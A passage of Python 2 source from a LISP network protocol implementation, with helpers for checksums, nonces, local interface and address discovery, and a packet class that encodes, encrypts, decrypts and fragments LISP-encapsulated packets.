return(bold("\033[94m" + string + "\033[0m", html))
#enddef
#
# bold
#
# For printing banner.
#
def bold(string, html):
if (html): return("<b>{}</b>".format(string))
return("\033[1m" + string + "\033[0m")
#enddef
#
# convert_font
#
# Converts from text baesd bold/color to HTML bold/color.
#
def convert_font(string):
escapes = [ ["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold] ]
right = "[0m"
for e in escapes:
left = e[0]
color = e[1]
offset = len(left)
index = string.find(left)
if (index != -1): break
#endfor
while (index != -1):
end = string[index::].find(right)
bold_string = string[index+offset:index+end]
string = string[:index] + color(bold_string, True) + \
string[index+end+offset::]
index = string.find(left)
#endwhile
#
# Call this function one more time if a color was in bold.
#
if (string.find("[1m") != -1): string = convert_font(string)
return(string)
#enddef
#
# lisp_space
#
# Put whitespace in URL encoded string.
#
def lisp_space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_button
#
# Return string of a LISP html button.
#
def lisp_button(string, url):
b = '<button style="background-color:transparent;border-radius:10px; ' + \
'type="button">'
if (url == None):
html = b + string + "</button>"
else:
a = '<a href="{}">'.format(url)
s = lisp_space(2)
html = s + a + b + string + "</button></a>" + s
#endif
return(html)
#enddef
#
# lisp_print_cour
#
# Print in HTML Courier-New font.
#
def lisp_print_cour(string):
output = '<font face="Courier New">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_print_sans
#
# Print in HTML Sans-Serif font.
#
def lisp_print_sans(string):
output = '<font face="Sans-Serif">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_span
#
# Print out string when a pointer hovers over some text.
#
def lisp_span(string, hover_string):
output = '<span title="{}">{}</span>'.format(hover_string, string)
return(output)
#enddef
#
# lisp_eid_help_hover
#
# Create hover title for any input EID form.
#
def lisp_eid_help_hover(output):
eid_help_str = \
'''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# lisp_geo_help_hover
#
# Create hover title for any input Geo or EID form.
#
def lisp_geo_help_hover(output):
eid_help_str = \
'''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# space
#
# Put whitespace in URL encoded string.
#
def space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_get_ephemeral_port
#
# Select random UDP port for use of a source port in a Map-Request and
# destination port in a Map-Reply.
#
def lisp_get_ephemeral_port():
return(random.randrange(32768, 65535))
#enddef
#
# lisp_get_data_nonce
#
# Get a 24-bit random nonce to insert in data header.
#
def lisp_get_data_nonce():
return(random.randint(0, 0xffffff))
#enddef
#
# lisp_get_control_nonce
#
# Get a 64-bit random nonce to insert in control packets.
#
def lisp_get_control_nonce():
return(random.randint(0, (2**64)-1))
#enddef
#
# lisp_hex_string
#
# Take an integer, either 16, 32, or 64 bits in width and return a hex string.
# But don't return the leading "0x". And don't return a trailing "L" if the
# integer is a negative 64-bit value (high-order bit set).
#
def lisp_hex_string(integer_value):
value = hex(integer_value)[2::]
if (value[-1] == "L"): value = value[0:-1]
return(value)
#enddef
#
# lisp_get_timestamp
#
# Use time library to get a current timestamp.
#
def lisp_get_timestamp():
return(time.time())
#enddef
#
# lisp_set_timestamp
#
# Use time library to set time into the future.
#
def lisp_set_timestamp(seconds):
return(time.time() + seconds)
#enddef
#
# lisp_print_elapsed
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_elapsed(ts):
if (ts == 0 or ts == None): return("never")
elapsed = time.time() - ts
elapsed = round(elapsed, 0)
return(str(datetime.timedelta(seconds=elapsed)))
#enddef
#
# lisp_print_future
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_future(ts):
if (ts == 0): return("never")
future = ts - time.time()
if (future < 0): return("expired")
future = round(future, 0)
return(str(datetime.timedelta(seconds=future)))
#enddef
#
# lisp_print_eid_tuple
#
# Prints in html or returns a string of the following combinations:
#
# [<iid>]<eid>/<ml>
# <eid>/<ml>
# ([<iid>]<source-eid>/ml, [<iid>]<group>/ml)
#
# This is called by most of the data structure classes as "print_eid_tuple()".
#
def lisp_print_eid_tuple(eid, group):
eid_str = eid.print_prefix()
if (group.is_null()): return(eid_str)
group_str = group.print_prefix()
iid = group.instance_id
if (eid.is_null() or eid.is_exact_match(group)):
index = group_str.find("]") + 1
return("[{}](*, {})".format(iid, group_str[index::]))
#endif
sg_str = eid.print_sg(group)
return(sg_str)
#enddef
#
# lisp_convert_6to4
#
# IPC messages will store an IPv4 address in an IPv6 "::ffff:<ipv4-addr>"
# format since we have a udp46 tunnel open. Convert it an IPv4 address.
#
def lisp_convert_6to4(addr_str):
if (addr_str.find("::ffff:") == -1): return(addr_str)
addr = addr_str.split(":")
return(addr[-1])
#enddef
#
# lisp_convert_4to6
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If destination is IPv4 we
# need to put the address in a IPv6 IPv4-compatible format.
#
# Returns a lisp_address().
#
def lisp_convert_4to6(addr_str):
addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
addr.store_address(addr_str)
return(addr)
#enddef
#
# lisp_gethostbyname
#
# Return an address if string is a name or address. If socket.gethostbyname()
# fails, try socekt.getaddrinfo(). We may be running on Alpine Linux which
# doesn't return DNS names with gethostbyname().
#
def lisp_gethostbyname(string):
ipv4 = string.split(".")
ipv6 = string.split(":")
mac = string.split("-")
if (len(ipv4) > 1):
if (ipv4[0].isdigit()): return(string)
#endif
if (len(ipv6) > 1):
try:
int(ipv6[0], 16)
return(string)
except:
pass
#endtry
#endif
#
# Make sure there are hex digits between dashes, otherwise could be a
# valid DNS name with dashes.
#
if (len(mac) == 3):
for i in range(3):
try: int(mac[i], 16)
except: break
#endfor
#endif
try:
addr = socket.gethostbyname(string)
return(addr)
except:
if (lisp_is_alpine() == False): return("")
#endtry
#
# Try different approach on Alpine.
#
try:
addr = socket.getaddrinfo(string, 0)[0]
if (addr[3] != string): return("")
addr = addr[4][0]
except:
addr = ""
#endtry
return(addr)
#enddef
#
# lisp_ip_checksum
#
# Input to this function is 20-bytes in packed form. Calculate IP header
# checksum and place in byte 10 and byte 11 of header.
#
def lisp_ip_checksum(data, hdrlen=20):
if (len(data) < hdrlen):
lprint("IPv4 packet too short, length {}".format(len(data)))
return(data)
#endif
ip = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, hdrlen*2, 4):
checksum += int(ip[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
ip = data[0:10] + checksum + data[12::]
return(ip)
#enddef
#
# lisp_icmp_checksum
#
# Checksum a ICMP Destination Unreachable Too Big message. It will staticly
# checksum 36 bytes.
#
def lisp_icmp_checksum(data):
if (len(data) < 36):
lprint("ICMP packet too short, length {}".format(len(data)))
return(data)
#endif
icmp = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 36, 4):
checksum += int(icmp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 2 and 4.
#
checksum = struct.pack("H", checksum)
icmp = data[0:2] + checksum + data[4::]
return(icmp)
#enddef
#
# lisp_udp_checksum
#
# Calculate the UDP pseudo header checksum. The variable 'data' is a UDP
# packet buffer starting with the UDP header with the checksum field zeroed.
#
# What is returned is the UDP packet buffer with a non-zero/computed checksum.
#
# The UDP pseudo-header is prepended to the UDP packet buffer which the
# checksum runs over:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Source Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Destination Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Upper-Layer Packet Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | zero | Next Header |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lisp_udp_checksum(source, dest, data):
#
# Build pseudo-header for IPv6.
#
s = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
d = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
udplen = socket.htonl(len(data))
next_header = socket.htonl(LISP_UDP_PROTOCOL)
pheader = s.pack_address()
pheader += d.pack_address()
pheader += struct.pack("II", udplen, next_header)
#
# Append UDP packet to pseudo-header. Add zeros to make 4 byte aligned.
#
udp = binascii.hexlify(pheader + data)
add = len(udp) % 4
for i in range(0,add): udp += "0"
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, len(udp), 4):
checksum += int(udp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at last 2 bytes of UDP header.
#
checksum = struct.pack("H", checksum)
udp = data[0:6] + checksum + data[8::]
return(udp)
#enddef
#
# lisp_igmp_checksum
#
# Comppute IGMP checksum. This is specialzed for an IGMP query 12-byte
# header.
#
def lisp_igmp_checksum(igmp):
g = binascii.hexlify(igmp)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 24, 4):
checksum += int(g[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
igmp = igmp[0:2] + checksum + igmp[4::]
return(igmp)
#enddef
#
# lisp_get_interface_address
#
# Based on supplied interface device, return IPv4 local interface address.
#
def lisp_get_interface_address(device):
#
# Check for illegal device name.
#
if (device not in netifaces.interfaces()): return(None)
#
# Check if there are no IPv4 addresses assigned to interface.
#
addresses = netifaces.ifaddresses(device)
if (addresses.has_key(netifaces.AF_INET) == False): return(None)
#
# Find first private address.
#
return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)
for addr in addresses[netifaces.AF_INET]:
addr_str = addr["addr"]
return_address.store_address(addr_str)
return(return_address)
#endfor
return(None)
#enddef
#
# lisp_get_input_interface
#
# Based on destination-MAC address of incoming pcap'ed packet, index into
# lisp_mymacs{} to get a interface name string (device name) for all
# interfaces that have the MAC address assigned.
#
# If dest-MAC is not us, look at source MAC to see if we are in a loopback
# situation testing application and xTR in the same system.
#
def lisp_get_input_interface(packet):
macs = lisp_format_packet(packet[0:12]).replace(" ", "")
da = macs[0:12]
sa = macs[12::]
try: my_sa = lisp_mymacs.has_key(sa)
except: my_sa = False
if (lisp_mymacs.has_key(da)): return(lisp_mymacs[da], sa, da, my_sa)
if (my_sa): return(lisp_mymacs[sa], sa, da, my_sa)
return(["?"], sa, da, my_sa)
#enddef
#
# lisp_get_local_interfaces
#
# Go populate the lisp.myinterfaces{} dictionary array. Key is device ID
# returned by the netifaces API.
#
def lisp_get_local_interfaces():
for device in netifaces.interfaces():
interface = lisp_interface(device)
interface.add_interface()
#endfor
return
#enddef
#
# lisp_get_loopback_address
#
# Get first loopback address on device lo which is not 127.0.0.1.
#
def lisp_get_loopback_address():
for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
if (addr["peer"] == "127.0.0.1"): continue
return(addr["peer"])
#endif
return(None)
#enddef
#
# lisp_is_mac_string
#
# Return True if the supplied string parameter is iin form of "xxxx-xxxx-xxxx".
# The input prefix could be "xxxx-xxxx-xxxx/48".
#
def lisp_is_mac_string(mac_str):
mac = mac_str.split("/")
if (len(mac) == 2): mac_str = mac[0]
return(len(mac_str) == 14 and mac_str.count("-") == 2)
#enddef
#
# lisp_get_local_macs
#
# Walk all interfaces, and for each ethernet interface, put the MAC address
# as a key into lisp_mymacs with a value of array of interface names.
#
def lisp_get_local_macs():
for device in netifaces.interfaces():
#
# Ignore bogus interface names that containers may create. Allow
# interfaces ones with colons, dashes and alphanumeric characters.
#
d = device.replace(":", "")
d = device.replace("-", "")
if (d.isalnum() == False): continue
#
# Need this for EOS because a "pimreg" interface will crash the call
# to netifaces.ifaddresses("pimreg").
#
try:
parms = netifaces.ifaddresses(device)
except:
continue
#endtry
if (parms.has_key(netifaces.AF_LINK) == False): continue
mac = parms[netifaces.AF_LINK][0]["addr"]
mac = mac.replace(":", "")
#
# GRE tunnels have strange MAC addresses (less than 48-bits). Ignore
# them.
#
if (len(mac) < 12): continue
if (lisp_mymacs.has_key(mac) == False): lisp_mymacs[mac] = []
lisp_mymacs[mac].append(device)
#endfor
lprint("Local MACs are: {}".format(lisp_mymacs))
return
#enddef
#
# lisp_get_local_rloc
#
# Use "ip addr show" on Linux and "ifconfig" on MacOS to get a local IPv4
# address. Get interface name from "netstat -rn" to grep for.
#
def lisp_get_local_rloc():
out = commands.getoutput("netstat -rn | egrep 'default|0.0.0.0'")
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#
# Get last item on first line of output.
#
out = out.split("\n")[0]
device = out.split()[-1]
addr = ""
macos = lisp_is_macos()
if (macos):
out = commands.getoutput("ifconfig {} | egrep 'inet '".format(device))
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
else:
cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
out = commands.getoutput(cmd)
if (out == ""):
cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
out = commands.getoutput(cmd)
#endif
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#endif
#
# Check for multi-line. And favor returning private address so NAT
# traversal is used in lig.
#
addr = ""
out = out.split("\n")
for line in out:
a = line.split()[1]
if (macos == False): a = a.split("/")[0]
address = lisp_address(LISP_AFI_IPV4, a, 32, 0)
return(address)
#endif
return(lisp_address(LISP_AFI_IPV4, addr, 32, 0))
#endif
#
# lisp_get_local_addresses
#
# Use netifaces module to get a IPv4 and IPv6 local RLOC of this system.
# Return an array of 2 elements where [0] is an IPv4 RLOC and [1] is an
# IPv6 RLOC.
#
# Stores data in lisp.lisp_myrlocs[].
#
def lisp_get_local_addresses():
global lisp_myrlocs
#
# Check to see if we should not get the first address. Use environment
# variable (1-based addressing) to determine which one to get. If the
# number of addresses are less than the index, use the last one.
#
# The format of the environment variable could be <number> or
# <device>:<number>. The format could also be "<device>:" but make sure
# the user typed in a ":".
#
device_select = None
index = 1
parm = os.getenv("LISP_ADDR_SELECT")
if (parm != None and parm != ""):
parm = parm.split(":")
if (len(parm) == 2):
device_select = parm[0]
index = parm[1]
else:
if (parm[0].isdigit()):
index = parm[0]
else:
device_select = parm[0]
#endif
#endif
index = 1 if (index == "") else int(index)
#endif
rlocs = [None, None, None]
rloc4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
rloc6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
device_iid = None
for device in netifaces.interfaces():
if (device_select != None and device_select != device): continue
addresses = netifaces.ifaddresses(device)
if (addresses == {}): continue
#
# Set instance-ID for interface.
#
device_iid = lisp_get_interface_instance_id(device, None)
#
# Look for a non-link-local and non-loopback address.
#
if (addresses.has_key(netifaces.AF_INET)):
ipv4 = addresses[netifaces.AF_INET]
count = 0
for addr in ipv4:
rloc4.store_address(addr["addr"])
if (rloc4.is_ipv4_loopback()): continue
if (rloc4.is_ipv4_link_local()): continue
if (rloc4.address == 0): continue
count += 1
rloc4.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc4, False)): continue
rlocs[0] = rloc4
if (count == index): break
#endfor
#endif
if (addresses.has_key(netifaces.AF_INET6)):
ipv6 = addresses[netifaces.AF_INET6]
count = 0
for addr in ipv6:
addr_str = addr["addr"]
rloc6.store_address(addr_str)
if (rloc6.is_ipv6_string_link_local(addr_str)): continue
if (rloc6.is_ipv6_loopback()): continue
count += 1
rloc6.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc6, False)): continue
rlocs[1] = rloc6
if (count == index): break
#endfor
#endif
#
# Did we find an address? If not, loop and get the next interface.
#
if (rlocs[0] == None): continue
rlocs[2] = device
break
#endfor
addr1 = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
addr2 = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
device = rlocs[2] if rlocs[2] else "none"
device_select = " (user selected)" if device_select != None else ""
addr1 = red(addr1, False)
addr2 = red(addr2, False)
device = bold(device, False)
lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}". \
format(addr1, addr2, device, device_select, device_iid))
lisp_myrlocs = rlocs
return((rlocs[0] != None))
#enddef
#
# lisp_get_all_addresses
#
# Return a list of all local IPv4 and IPv6 addresses from kernel. This is
# going to be used for building pcap and iptables filters. So no loopback or
# link-local addresses are returned.
#
def lisp_get_all_addresses():
address_list = []
for interface in netifaces.interfaces():
try: entry = netifaces.ifaddresses(interface)
except: continue
if (entry.has_key(netifaces.AF_INET)):
for addr in entry[netifaces.AF_INET]:
a = addr["addr"]
if (a.find("127.0.0.1") != -1): continue
address_list.append(a)
#endfor
#endif
if (entry.has_key(netifaces.AF_INET6)):
for addr in entry[netifaces.AF_INET6]:
a = addr["addr"]
if (a == "::1"): continue
if (a[0:5] == "fe80:"): continue
address_list.append(a)
#endfor
#endif
#endfor
return(address_list)
#enddef
#
# lisp_get_all_multicast_rles
#
# Grep lisp.config and get all multicast RLEs that appear in the configuration.
# Returns either an empty array or filled with one or more multicast addresses.
#
def lisp_get_all_multicast_rles():
rles = []
out = commands.getoutput('egrep "rle-address =" ./lisp.config')
if (out == ""): return(rles)
lines = out.split("\n")
for line in lines:
if (line[0] == "#"): continue
rle = line.split("rle-address = ")[1]
rle_byte = int(rle.split(".")[0])
if (rle_byte >= 224 and rle_byte < 240): rles.append(rle)
#endfor
return(rles)
#enddef
#------------------------------------------------------------------------------
#
# LISP packet contents. This keeps state for a LISP encapsulated packet that
# is processed by an RTR and ETR.
#
class lisp_packet():
def __init__(self, packet):
self.outer_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_tos = 0
self.outer_ttl = 0
self.udp_sport = 0
self.udp_dport = 0
self.udp_length = 0
self.udp_checksum = 0
self.inner_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_sport = 0
self.inner_dport = 0
self.lisp_header = lisp_data_header()
self.packet = packet
self.inner_version = 0
self.outer_version = 0
self.encap_port = LISP_DATA_PORT
self.inner_is_fragment = False
self.packet_error = ""
self.gleaned_dest = False
#enddef
def encode(self, nonce):
#
# We could be running with no RLOCs found. If lisp_myrlocs[] is None,
# then self.outer_source will be LISP_AFI_NONE.
#
if (self.outer_source.is_null()): return(None)
#
# We have to build the LISP header here because if we are doing
# lisp-crypto, the ICV covers the LISP header. The function
# lisp_packet.encrypt() will put in the key-id.
#
if (nonce == None):
self.lisp_header.nonce(lisp_get_data_nonce())
elif (self.lisp_header.is_request_nonce(nonce)):
self.lisp_header.request_nonce(nonce)
else:
self.lisp_header.nonce(nonce)
#endif
self.lisp_header.instance_id(self.inner_dest.instance_id)
#
# Encrypt the packet. If something went wrong, send unencrypted packet
# by telling RLOC with key-id 0. For now, just use key-id 1. We are
# supporting just a single key.
#
self.lisp_header.key_id(0)
control = (self.lisp_header.get_instance_id() == 0xffffff)
if (lisp_data_plane_security and control == False):
addr_str = self.outer_dest.print_address_no_iid() + ":" + \
str(self.encap_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]):
keys[1].use_count += 1
packet, encrypted = self.encrypt(keys[1], addr_str)
if (encrypted): self.packet = packet
#endif
#endif
#endif
#
# Start with UDP header. Call hash_packet() to set source-port value.
# Unless we are doing lisp-crypto and nat-traversal.
#
self.udp_checksum = 0
if (self.encap_port == LISP_DATA_PORT):
if (lisp_crypto_ephem_port == None):
if (self.gleaned_dest):
self.udp_sport = LISP_DATA_PORT
else:
self.hash_packet()
#endif
else:
self.udp_sport = lisp_crypto_ephem_port
#endif
else:
self.udp_sport = LISP_DATA_PORT
#endif
self.udp_dport = self.encap_port
self.udp_length = len(self.packet) + 16
#
# IPv6 raw sockets need to have the UDP ports not swapped.
#
if (self.outer_version == 4):
sport = socket.htons(self.udp_sport)
dport = socket.htons(self.udp_dport)
else:
sport = self.udp_sport
dport = self.udp_dport
#endif
dport = socket.htons(self.udp_dport) if self.outer_version == 4 else \
self.udp_dport
udp = struct.pack("HHHH", sport, dport, socket.htons(self.udp_length),
self.udp_checksum)
#
# Encode the LISP header.
#
lisp = self.lisp_header.encode()
#
# Now prepend all 3 headers, LISP, UDP, outer header. See lisp_packet.
# fix_outer_header() for byte-swap details for the frag-offset field.
#
if (self.outer_version == 4):
tl = socket.htons(self.udp_length + 20)
frag = socket.htons(0x4000)
outer = struct.pack("BBHHHBBH", 0x45, self.outer_tos, tl, 0xdfdf,
frag, self.outer_ttl, 17, 0)
outer += self.outer_source.pack_address()
outer += self.outer_dest.pack_address()
outer = lisp_ip_checksum(outer)
elif (self.outer_version == 6):
outer = ""
# short = 6 << 12
# short |= self.outer_tos << 4
# short = socket.htons(short)
# tl = socket.htons(self.udp_length)
# outer = struct.pack("HHHBB", short, 0, tl, 17, self.outer_ttl)
# outer += self.outer_source.pack_address()
# outer += self.outer_dest.pack_address()
else:
return(None)
#endif
self.packet = outer + udp + lisp + self.packet
return(self)
#enddef
def cipher_pad(self, packet):
length = len(packet)
if ((length % 16) != 0):
pad = ((length/16) + 1) * 16
packet = packet.ljust(pad)
#endif
return(packet)
#enddef
def encrypt(self, key, addr_str):
if (key == None or key.shared_key == None):
return([self.packet, False])
#endif
#
# Pad packet to multiple of 16 bytes and call AES cipher.
#
packet = self.cipher_pad(self.packet)
iv = key.get_iv()
ts = lisp_get_timestamp()
aead = None
if (key.cipher_suite == LISP_CS_25519_CHACHA):
encrypt = chacha.ChaCha(key.encrypt_key, iv).encrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
aesgcm = AES.new(k, AES.MODE_GCM, iv)
encrypt = aesgcm.encrypt
aead = aesgcm.digest
except:
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([self.packet, False])
#endtry
else:
k = binascii.unhexlify(key.encrypt_key)
encrypt = AES.new(k, AES.MODE_CBC, iv).encrypt
#endif
ciphertext = encrypt(packet)
if (ciphertext == None): return([self.packet, False])
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# GCM requires 16 bytes of an AEAD MAC tag at the end of the
# ciphertext. Needed to interoperate with the Go implemenation of
# AES-GCM. The MAC digest was computed above.
#
if (aead != None): ciphertext += aead()
#
# Compute ICV and append to packet. ICV covers the LISP header, the
# IV, and the cipertext.
#
self.lisp_header.key_id(key.key_id)
lisp = self.lisp_header.encode()
icv = key.do_icv(lisp + iv + ciphertext, iv)
ps = 4 if (key.do_poly) else 8
string = bold("Encrypt", False)
cipher_str = bold(key.cipher_suite_string, False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): 0x{}...{}".format(auth, icv[0:ps], icv[-ps::])
dprint("{} for key-id: {}, {}, {}, {}-time: {} usec".format( \
string, key.key_id, addr_str, icv_str, cipher_str, ts))
icv = int(icv, 16)
if (key.do_poly):
icv1 = byte_swap_64((icv >> 64) & LISP_8_64_MASK)
icv2 = byte_swap_64(icv & LISP_8_64_MASK)
icv = struct.pack("QQ", icv1, icv2)
else:
icv1 = byte_swap_64((icv >> 96) & LISP_8_64_MASK)
icv2 = byte_swap_64((icv >> 32) & LISP_8_64_MASK)
icv3 = socket.htonl(icv & 0xffffffff)
icv = struct.pack("QQI", icv1, icv2, icv3)
#endif
return([iv + ciphertext + icv, True])
#enddef
def decrypt(self, packet, header_length, key, addr_str):
#
# Do ICV first. If it succeeds, then decrypt. Get ICV from packet and
# truncate packet to run hash over. Compare packet hash with computed
# hash.
#
if (key.do_poly):
icv1, icv2 = struct.unpack("QQ", packet[-16::])
packet_icv = byte_swap_64(icv1) << 64
packet_icv |= byte_swap_64(icv2)
packet_icv = lisp_hex_string(packet_icv).zfill(32)
packet = packet[0:-16]
ps = 4
hash_str = bold("poly", False)
else:
icv1, icv2, icv3 = struct.unpack("QQI", packet[-20::])
packet_icv = byte_swap_64(icv1) << 96
packet_icv |= byte_swap_64(icv2) << 32
packet_icv |= socket.htonl(icv3)
packet_icv = lisp_hex_string(packet_icv).zfill(40)
packet = packet[0:-20]
ps = 8
hash_str = bold("sha", False)
#endif
lisp = self.lisp_header.encode()
#
# Get the IV and use it to decrypt and authenticate..
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
iv_len = 8
cipher_str = bold("chacha", False)
elif (key.cipher_suite == LISP_CS_25519_GCM):
iv_len = 12
cipher_str = bold("aes-gcm", False)
else:
iv_len = 16
cipher_str = bold("aes-cbc", False)
#endif
iv = packet[0:iv_len]
#
# Compute ICV over LISP header and packet payload.
#
computed_icv = key.do_icv(lisp + packet, iv)
p_icv = "0x{}...{}".format(packet_icv[0:ps], packet_icv[-ps::])
c_icv = "0x{}...{}".format(computed_icv[0:ps], computed_icv[-ps::])
if (computed_icv != packet_icv):
self.packet_error = "ICV-error"
funcs = cipher_str + "/" + hash_str
fail = bold("ICV failed ({})".format(funcs), False)
icv_str = "packet-ICV {} != computed-ICV {}".format(p_icv, c_icv)
dprint(("{} from RLOC {}, receive-port: {}, key-id: {}, " + \
"packet dropped, {}").format(fail, red(addr_str, False),
self.udp_sport, key.key_id, icv_str))
dprint("{}".format(key.print_keys()))
#
# This is the 4-tuple NAT case. There another addr:port that
# should have the crypto-key the encapsulator is using. This is
# typically done on the RTR.
#
lisp_retry_decap_keys(addr_str, lisp + packet, iv, packet_icv)
return([None, False])
#endif
#
# Advance over IV for decryption.
#
packet = packet[iv_len::]
#
# Call AES or chacha cipher. Make sure for AES that
#
ts = lisp_get_timestamp()
if (key.cipher_suite == LISP_CS_25519_CHACHA):
decrypt = chacha.ChaCha(key.encrypt_key, iv).decrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
decrypt = AES.new(k, AES.MODE_GCM, iv).decrypt
except:
self.packet_error = "no-decrypt-key"
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([None, False])
#endtry
else:
if ((len(packet) % 16) != 0):
dprint("Ciphertext not multiple of 16 bytes, packet dropped")
return([None, False])
#endif
k = binascii.unhexlify(key.encrypt_key)
decrypt = AES.new(k, AES.MODE_CBC, iv).decrypt
#endif
plaintext = decrypt(packet)
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# Now decrypt packet and return plaintext payload.
#
string = bold("Decrypt", False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): {}".format(auth, p_icv)
dprint("{} for key-id: {}, {}, {} (good), {}-time: {} usec". \
format(string, key.key_id, addr_str, icv_str, cipher_str, ts))
#
# Keep self.packet the outer header, UDP header, and LISP header.
# We will append the plaintext in the caller once we parse the inner
# packet length so we can truncate any padding the encryptor put on.
#
self.packet = self.packet[0:header_length]
return([plaintext, True])
#enddef
def fragment_outer(self, outer_hdr, inner_packet):
frag_len = 1000
#
# Break up packet payload in fragments and put in array to have
# IP header added in next loop below.
#
frags = []
offset = 0
length = len(inner_packet)
while (offset < length):
frag = inner_packet[offset::]
if (len(frag) > frag_len): frag = frag[0:frag_len]
frags.append(frag)
offset += len(frag)
#endwhile
#
# Now fix outer IPv4 header with fragment-offset values and add the
# IPv4 value.
#
fragments = []
offset = 0
for frag in frags:
#
# Set frag-offset field in outer IPv4 header.
#
fo = offset if (frag == frags[-1]) else 0x2000 + offset
fo = socket.htons(fo)
outer_hdr = outer_hdr[0:6] + struct.pack("H", fo) + outer_hdr[8::]
#
# Set total-length field in outer IPv4 header and checksum.
#
l = socket.htons(len(frag) + 20)
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragments.append(outer_hdr + frag)
offset += len(frag) / 8
#endfor
return(fragments)
#enddef
